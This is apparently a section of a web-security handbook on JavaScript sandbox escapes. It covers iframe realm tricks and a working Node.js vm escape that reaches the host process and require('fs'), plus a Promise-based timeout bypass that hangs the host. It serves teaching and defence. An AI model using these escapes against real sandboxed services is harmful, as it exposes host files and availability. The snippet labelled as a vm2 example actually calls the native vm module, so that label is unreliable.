5.4.8. Sandbox escape

5.4.8.1. Frontend Sandbox

On the front end, sandboxing is often attempted by deleting eval and rewriting Function.prototype.constructor, GeneratorFunction, AsyncFunction and similar constructors. Such changes only affect the current realm: creating a new iframe provides a fresh execution environment with its own, untouched built-ins, which is the usual way this kind of sandbox is escaped.

5.4.8.2. Server Sandbox

Node.js provides the native vm module for isolating code contexts. However, the standard JavaScript API and the Node.js global environment are still reachable from inside such a context.

With the native vm module, a commonly used escape method is:

const vm = require('vm');
const sandbox = {};
const whatIsThis = vm.runInNewContext(`
    // "this" is the contextified sandbox; its prototype chain is the host's Object.prototype
    const ForeignObject = this.constructor;
    // Object.constructor is the host's Function constructor
    const ForeignFunction = ForeignObject.constructor;
    // a function built by the host Function constructor runs in the host context,
    // where the Node.js "process" global is visible
    const process = ForeignFunction("return process")();
    const require = process.mainModule.require;
    require("fs");
`, sandbox);

Because of these defects in the native vm module, some developers designed vm2 to provide a more secure isolation environment, but old versions also had escape methods, such as:

// The timeout only interrupts the synchronous while loop; the second loop,
// queued with Promise.then, runs from the microtask queue after the script
// returns, so the host is still blocked.
vm.runInNewContext(
  'Promise.resolve().then(()=>{while(1)console.log("foo", Date.now());}); while(1)console.log(Date.now())',
  {console:{log(){console.log.apply(console,arguments);}}},
  {timeout:5}
);